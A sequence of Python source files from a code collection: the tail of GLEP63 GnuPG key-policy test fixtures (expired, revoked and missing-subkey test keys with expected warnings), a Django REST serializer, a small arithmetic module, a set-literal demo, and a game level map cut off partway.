creation_date=datetime.datetime(1999, 12, 31, 23, 0, 46),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <nobody@gentoo.org>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyIssue(
key=KEY,
machine_desc='validity:expired',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyIssue(
key=KEY,
machine_desc='validity:expired',
long_desc='',
),
],
'glep63-1-strict': [
KeyIssue(
key=KEY,
machine_desc='validity:expired',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='validity:expired',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyIssue(
key=KEY,
machine_desc='validity:expired',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='validity:expired',
long_desc='',
),
],
}
class RevokedKeyTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'other/revoked-key.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:r:4096:1:CD407D01E7D00880:946682289:978218289::-:::sc::::::23::0:
fpr:::::::::F0769AC027B2117ECFAB7F1BCD407D01E7D00880:
uid:r::::946682289::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <nobody@gentoo.org>::::::::::0:
sub:r:4096:1:F9FDA2910B574DA4:946682301:978218301:::::s::::::23:
fpr:::::::::A76730D5141B96EFAA7B3E4AF9FDA2910B574DA4:
'''
KEY = PublicKey(
validity=Validity.REVOKED,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='CD407D01E7D00880',
creation_date=datetime.datetime(1999, 12, 31, 23, 18, 9),
expiration_date=datetime.datetime(2000, 12, 30, 23, 18, 9),
key_caps='sc',
curve='',
subkeys=[
Key(
validity=Validity.REVOKED,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='F9FDA2910B574DA4',
creation_date=datetime.datetime(1999, 12, 31, 23, 18, 21),
expiration_date=datetime.datetime(2000, 12, 30, 23, 18, 21),
key_caps='s',
curve='',
),
],
uids=[
UID(
validity=Validity.REVOKED,
creation_date=datetime.datetime(1999, 12, 31, 23, 18, 9),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <nobody@gentoo.org>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyIssue(
key=KEY,
machine_desc='validity:revoked',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyIssue(
key=KEY,
machine_desc='validity:revoked',
long_desc='',
),
],
'glep63-1-strict': [
KeyIssue(
key=KEY,
machine_desc='validity:revoked',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='validity:revoked',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyIssue(
key=KEY,
machine_desc='validity:revoked',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='validity:revoked',
long_desc='',
),
],
}
class NoSigningSubKeyTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'other/no-signing-subkey.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::scESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247212::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <nobody@gentoo.org>::::::::::0:
sub:-:4096:1:2D927DAC6A85C6BD:1533247212:1564783212:::::e::::::23:
fpr:::::::::F216FC6F6C4EC3AD4DE4A4AF2D927DAC6A85C6BD:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='scESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='2D927DAC6A85C6BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 12),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <nobody@gentoo.org>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-1-strict': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
}
class MultipurposeSubKeyTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'other/multipurpose-subkey.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247213::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <nobody@gentoo.org>::::::::::0:
sub:-:4096:1:2D927DAC6A85C6BD:1533247212:1564783212:::::es::::::23:
fpr:::::::::F216FC6F6C4EC3AD4DE4A4AF2D927DAC6A85C6BD:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='2D927DAC6A85C6BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 12),
key_caps='es',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 13),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <nobody@gentoo.org>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='subkey:multipurpose',
long_desc='',
),
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='subkey:multipurpose',
long_desc='',
),
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-1-strict': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='subkey:multipurpose',
long_desc='',
),
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-2': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='subkey:multipurpose',
long_desc='',
),
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-2-draft-20180707': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='subkey:multipurpose',
long_desc='',
),
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-2.1': [
SubKeyWarning(
key=KEY,
subkey=KEY.subkeys[0],
machine_desc='subkey:multipurpose',
long_desc='',
),
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
KeyIssue(
key=KEY,
machine_desc='subkey:none:e',
long_desc='',
),
],
}
class NoEncryptionSubKeyTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'other/no-encryption-subkey.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cSC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247213::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <nobody@gentoo.org>::::::::::0:
sub:-:4096:1:2D927DAC6A85C6BD:1533247212:1564783212:::::s::::::23:
fpr:::::::::F216FC6F6C4EC3AD4DE4A4AF2D927DAC6A85C6BD:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cSC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='2D927DAC6A85C6BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 12),
key_caps='s',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 13),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <nobody@gentoo.org>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [],
'glep63-1-rsa2048-ec25519': [],
'glep63-1-strict': [],
'glep63-2': [],
'glep63-2-draft-20180707': [],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:e',
long_desc='',
),
],
}
class RevokedGentooUIDTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'other/revoked-gentoo-uid.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247215::5D26637AF3E9C4C07D3971B0BFC9D8AB2C3F8CA3::GLEP63 test key <nobody@example.com>::::::::::0:
uid:r::::::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <nobody@gentoo.org>::::::::::0:
sub:-:4096:1:2D927DAC6A85C6BD:1533247212:1564783212:::::s::::::23:
fpr:::::::::F216FC6F6C4EC3AD4DE4A4AF2D927DAC6A85C6BD:
sub:-:4096:1:D1DE5B31DBAB4E09:1533247215:1564783215:::::e::::::23:
fpr:::::::::C40C2A33B028C24C6FA21BF0D1DE5B31DBAB4E09:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='2D927DAC6A85C6BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 12),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='D1DE5B31DBAB4E09',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 15),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 15),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 15),
expiration_date=None,
uid_hash='5D26637AF3E9C4C07D3971B0BFC9D8AB2C3F8CA3',
user_id='GLEP63 test key <nobody@example.com>',
),
UID(
validity=Validity.REVOKED,
creation_date=None,
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <nobody@gentoo.org>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyWarning(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyWarning(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-1-strict': [
KeyWarning(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyWarning(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
}
class NoGentooUIDTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'other/no-gentoo-uid.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247215::5D26637AF3E9C4C07D3971B0BFC9D8AB2C3F8CA3::GLEP63 test key <nobody@example.com>::::::::::0:
sub:-:4096:1:2D927DAC6A85C6BD:1533247212:1564783212:::::s::::::23:
fpr:::::::::F216FC6F6C4EC3AD4DE4A4AF2D927DAC6A85C6BD:
sub:-:4096:1:D1DE5B31DBAB4E09:1533247215:1564783215:::::e::::::23:
fpr:::::::::C40C2A33B028C24C6FA21BF0D1DE5B31DBAB4E09:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='2D927DAC6A85C6BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 12),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='D1DE5B31DBAB4E09',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 15),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 15),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 15),
expiration_date=None,
uid_hash='5D26637AF3E9C4C07D3971B0BFC9D8AB2C3F8CA3',
user_id='GLEP63 test key <nobody@example.com>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyWarning(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyWarning(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-1-strict': [
KeyWarning(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyWarning(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='uid:nogentoo',
long_desc='',
),
],
}
class RevokedSubKeyOnlyTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'other/revoked-subkey-only.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247213::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <nobody@gentoo.org>::::::::::0:
sub:r:4096:1:2D927DAC6A85C6BD:1533247212:1564783212:::::s::::::23:
fpr:::::::::F216FC6F6C4EC3AD4DE4A4AF2D927DAC6A85C6BD:
sub:r:4096:1:D1DE5B31DBAB4E09:1533247215:1564783215:::::e::::::23:
fpr:::::::::C40C2A33B028C24C6FA21BF0D1DE5B31DBAB4E09:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cC',
curve='',
subkeys=[
Key(
validity=Validity.REVOKED,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='2D927DAC6A85C6BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 12),
key_caps='s',
curve='',
),
Key(
validity=Validity.REVOKED,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='D1DE5B31DBAB4E09',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 15),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 15),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 13),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <nobody@gentoo.org>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-1-rsa2048-ec25519': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-1-strict': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-2': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-2-draft-20180707': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
],
'glep63-2.1': [
KeyIssue(
key=KEY,
machine_desc='subkey:none:s',
long_desc='',
),
KeyIssue(
key=KEY,
machine_desc='subkey:none:e',
long_desc='',
),
],
}
class RevokedShortSubKeyTest(tests.key_base.BaseKeyTest):
KEY_FILE = 'other/revoked-short-subkey.gpg'
GPG_COLONS = '''
tru::1:1556681170:1560354194:3:1:5
pub:-:4096:1:0F2446E70C90BD31:1533247200:1564783207::-:::cESC::::::23::0:
fpr:::::::::4D94D1CD1D552073A6579CE70F2446E70C90BD31:
uid:-::::1533247213::0DAFDC73F43FC173C2216BA2BB4928391676BF2F::GLEP63 test key <nobody@gentoo.org>::::::::::0:
sub:-:4096:1:2D927DAC6A85C6BD:1533247212:1564783212:::::s::::::23:
fpr:::::::::F216FC6F6C4EC3AD4DE4A4AF2D927DAC6A85C6BD:
sub:-:4096:1:D1DE5B31DBAB4E09:1533247215:1564783215:::::e::::::23:
fpr:::::::::C40C2A33B028C24C6FA21BF0D1DE5B31DBAB4E09:
sub:r:1024:1:B3486BCC2DC48389:1533247215:1564783215:::::s:::::::
fpr:::::::::DEFA19BB1BEC81CD0E8B2B63B3486BCC2DC48389:
sub:r:1024:1:31EF1F504A39CC46:1533247215:1564783215:::::e:::::::
fpr:::::::::4BDEA4604CAABF8C158B66F731EF1F504A39CC46:
'''
KEY = PublicKey(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='0F2446E70C90BD31',
creation_date=datetime.datetime(2018, 8, 2, 22, 0),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 7),
key_caps='cESC',
curve='',
subkeys=[
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='2D927DAC6A85C6BD',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 12),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 12),
key_caps='s',
curve='',
),
Key(
validity=Validity.NO_VALUE,
key_length=4096,
key_algo=KeyAlgo.RSA,
keyid='D1DE5B31DBAB4E09',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 15),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 15),
key_caps='e',
curve='',
),
Key(
validity=Validity.REVOKED,
key_length=1024,
key_algo=KeyAlgo.RSA,
keyid='B3486BCC2DC48389',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 15),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 15),
key_caps='s',
curve='',
),
Key(
validity=Validity.REVOKED,
key_length=1024,
key_algo=KeyAlgo.RSA,
keyid='31EF1F504A39CC46',
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 15),
expiration_date=datetime.datetime(2019, 8, 2, 22, 0, 15),
key_caps='e',
curve='',
),
],
uids=[
UID(
validity=Validity.NO_VALUE,
creation_date=datetime.datetime(2018, 8, 2, 22, 0, 13),
expiration_date=None,
uid_hash='0DAFDC73F43FC173C2216BA2BB4928391676BF2F',
user_id='GLEP63 test key <nobody@gentoo.org>',
),
],
)
EXPECTED_RESULTS = {
'glep63-1-rsa2048': [],
'glep63-1-rsa2048-ec25519': [],
'glep63-1-strict': [],
'glep63-2': [],
'glep63-2-draft-20180707': [],
'glep63-2.1': [],
}
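# --- Illustrative sketch (added; not part of the original test suite). ---
# The GPG_COLONS blobs above are GnuPG's machine-readable --with-colons
# output.  For a "pub" record, field 2 is validity, field 3 the key length,
# field 4 the algorithm id, field 5 the key id, and fields 6/7 the
# creation/expiration times as Unix timestamps.  A minimal standalone
# decode (assuming UTC timestamps) looks like:
def _parse_pub_line(line):
    fields = line.split(':')
    return {
        'validity': fields[1],
        'key_length': int(fields[2]),
        'key_algo': int(fields[3]),
        'keyid': fields[4],
        'creation_date': datetime.datetime.utcfromtimestamp(int(fields[5])),
    }
# For ExpiredKeyTest above, parsing its "pub:e:4096:1:DB44A8BC23B67AF4:..."
# line yields key_length=4096, keyid='DB44A8BC23B67AF4', and creation_date
# datetime.datetime(1999, 12, 31, 23, 0, 46), matching ExpiredKeyTest.KEY.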
----- [record] hexsha: e593bcc49333c758c423ea8f9d839deae920f486 | size: 1,048 | lang: Python | path: rodan/serializers/output.py | repo: carrieeex/Rodan @ 458e72990c2571fa727a0d026fb235faf30bffec | licenses: [MIT] | stars: 31 (2015-01-06T17:23:45 .. 2022-03-30T02:46:16) | issues: 258 (2015-01-02T19:34:57 .. 2022-01-19T16:34:21) | forks: 8 (2015-08-19T16:09:31 .. 2021-10-03T23:46:46) -----
from rest_framework import serializers
from rodan.models.output import Output
class OutputSerializer(serializers.HyperlinkedModelSerializer):
output_port_type = serializers.HyperlinkedRelatedField(
view_name="outputporttype-detail",
read_only=True,
lookup_field="uuid",
lookup_url_kwarg="pk",
)
class Meta:
model = Output
fields = (
"url",
"uuid",
"output_port_type_name",
"output_port_type",
"run_job",
"resource",
)
class OutputListSerializer(serializers.HyperlinkedModelSerializer):
output_port_type = serializers.HyperlinkedRelatedField(
view_name="outputporttype-detail",
read_only=True,
lookup_field="uuid",
lookup_url_kwarg="pk",
)
class Meta:
model = Output
fields = (
"url",
"uuid",
"output_port_type_name",
"output_port_type",
"run_job",
"resource",
)
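# --- Usage note (added sketch; request/queryset names are hypothetical). ---
# As with any DRF HyperlinkedModelSerializer, serializing needs a request in
# the context so the hyperlinked fields can build absolute URLs, e.g.:
#
#     serializer = OutputListSerializer(
#         Output.objects.all(), many=True, context={"request": request}
#     )
#     data = serializer.data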
----- [record] hexsha: e5a51d76d6c9e5d1ec6b1407ba81e9783a686d56 | size: 70 | lang: Python | path: Python3-TestFramework/TestFramework__unittest/ExampleModule.py | repo: anliven/Reading-Code-Learning-Python @ a814cab207bbaad6b5c69b9feeb8bf2f459baf2b | licenses: [Apache-2.0] -----
def e_sum(x, y):
return x + y
def e_sub(x, y):
return x - y
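# --- Illustrative usage (added sketch; runs only when executed directly). ---
# The module lives under TestFramework__unittest, so a minimal companion
# test case could exercise e_sum/e_sub like this:
if __name__ == "__main__":
    import unittest

    class ExampleModuleTest(unittest.TestCase):
        def test_e_sum(self):
            self.assertEqual(e_sum(2, 3), 5)

        def test_e_sub(self):
            self.assertEqual(e_sub(5, 3), 2)

    unittest.main()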
----- [record] hexsha: e5c86228d9225334ddb4b762fd40f06044accf9c | size: 171 | lang: Python | path: 05/00/set.py | repo: pylangstudy/201708 @ 126b1af96a1d1f57522d5a1d435b58597bea2e57 | licenses: [CC0-1.0] | issues: 39 (2017-07-31T22:54:01 .. 2017-08-31T00:19:03) -----
s = set(); print(s, type(s))
s = set([1,2,3]); print(s, type(s))
s = set([1,2,3,2,1]); print(s, type(s))
s = {}; print(s, type(s))  # dict: {} is an empty dict, not an empty set
s = {1,2,3,2,1}; print(s, type(s))
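# --- Illustrative continuation (added sketch). ---
# As noted above, {} is an empty dict, so set() is needed for an empty set.
# Sets also dedupe and support the usual algebra:
a = {1,2,3}; b = {2,3,4}
print(a | b, a & b, a - b)  # union, intersection, difference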
----- [record] hexsha: e5fa937ade8982496b09e9d46ad051cadf38692d | size: 2,246 | lang: Python | path: map.py | repo: kootee/QuantumGames2020 @ def5118ccf4d8cb94342e37278d366faa926c43a | licenses: [Apache-2.0] | stars: 1 (2020-04-24T12:03:57) -----
level = [
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 0, 0, 0, 0, 0, 2, 1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #0-2
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #3-5
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 0, 0, 0, 0, 0, 2, 1), #6-8
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #9-11
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #12-14
(1, 0, 0, 0, 0, 0, 2, 1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #15-17
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #18-20
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 0, 0, 0, 0, 0, 2, 1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #21-23
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #24-26
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 0, 0, 1, 0, 1, 0, 1), #27-29
(1, 1 ,0 ,1 ,1 ,0 ,0 ,1), (0, 0, 0, 0, 0, 0, 0, 1), (1, 1, 0, 1, 1, 0, 0, 1), #30-32
(0, 0, 0, 0, 0, 0, 0 ,1), (1, 0, 0, 0, 0, 0, 0, 1), (1, 0, 0, 0, 0, 0, 0, 1), #33-35
(1, 0, 0, 0, 0, 0, 0, 0), (1, 0, 0, 0, 0, 0, 0 ,0), (0, 0, 0, 0, 0, 0, 0, 0), #36-38
(1, 0, 0, 1, 1, 1, 0, 1), (1, 0, 0, 1, 1, 1 ,0 ,1), (1, 0, 0, 0, 1, 1, 1, 1), #39-41
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #42-44
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #45-47
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #48-50
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #51-53
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #54-56
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #57-59
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #60-62
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #63-65
(1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), (1, 1 ,1 ,1 ,1 ,1 ,1 ,1), #66-68
